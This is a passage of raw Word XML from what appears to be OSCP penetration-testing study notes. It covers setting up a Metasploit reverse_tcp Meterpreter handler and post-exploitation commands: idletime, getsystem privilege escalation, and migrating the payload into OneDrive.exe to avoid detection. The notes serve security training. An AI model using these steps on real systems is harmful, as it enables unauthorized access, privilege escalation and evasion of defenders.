        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000051E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000051F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This must match exactly what you used in msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the LHOST and LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optional: Set session behavior</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000522">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want it to run without stopping after a session ends:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000523">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set ExitOnSession false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000524">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show advanced</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to look at the settings for this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000525">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000526">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then execute the msfvenom executable on the target machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000527">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sxzo87e2uium" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000528">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m3667ew8tz60" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Core </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation Features</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From OSCP (21.3.1. Core Meterpreter Post-Exploitation Features)</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">idletime:</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The first post-exploitation command we use is idletime. It displays the time for which a user has been idle. After obtaining basic information about the current user and operating system, this should be one of our first commands as it indicates if the target machine is currently in use or not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000052F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3852863" cy="716237"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29"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3852863" cy="716237"/>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The output states that the user hasn't been interacting with the system for 9 minutes and 53 seconds, suggesting the user may have stepped away from their computer. If the result of the idletime command indicates that the user is away, we can take this as an opportunity to execute programs or commands which may display a command-line window such as CMD or PowerShell for a moment.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem (automated privilege escalation):</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For several post-exploitation features, we need administrative privileges to execute them. Metasploit contains the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which attempts to automatically elevate our permissions to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It uses various techniques using named pipe impersonation and token duplication. In the default settings, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses all available techniques (shown in the help menu) attempting to leverage</w:t>
      </w:r>
      <w:hyperlink r:id="rId98">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId99">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:hyperlink r:id="rId100">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId101">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SeDebugPrivilege</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000536">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, let's start an interactive shell and confirm that our user has one of those two privileges assigned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000537">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4189006" cy="2067651"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="546" name="image530.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image530.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4189006" cy="2067651"/>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pacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 60 shows that the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> assigned. Now, let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to attempt to elevate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000539">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4757738" cy="1456295"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="260" name="image247.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image247.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4757738" cy="1456295"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 61 shows that getsystem successfully elevated our privileges to NT AUTHORITY\SYSTEM by using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Named Pipe Impersonation (PrintSpooler variant)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as we did manually in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Migrating is the process of hiding our reverse shell within another process since if we don't, then blue team can easily see our reverse shell process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When we compromise a host, our Meterpreter payload is executed inside the process of the application we attack or execute our payload. If the victim closes that process, our access to the machine is closed as well. In addition, depending on how the Windows binary file containing the Meterpreter payload is named, the process name may be suspicious if a defender is searching through the process list. We can use migrate to move the execution of our Meterpreter payload to a different process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000053F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's view all running processes by entering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Meterpreter command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000540">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2806700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="174" name="image189.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image189.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 62 shows that the process </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the process ID 2552. The name and path will easily make the process stand out to a defender reviewing the process list. The output shows that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> started a process related to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OneDrive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with process ID 8052. If our payload runs within this process, it is far less likely to be detected by reviewing the process list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000542">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We should note that we are only able to migrate into processes that execute at the same (or lower)</w:t>
      </w:r>
      <w:hyperlink r:id="rId105">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId106">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">integrity and privilege level</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> than that of our current process. In the context of this example, we already elevated our privileges to NT AUTHORITY\SYSTEM so our choices are plentiful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000543">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command returns the error </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Error while running command migrate: undefined method `pid' for nil</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, make sure Metasploit is updated to the latest version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000544">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's migrate our current process to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OneDrive.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
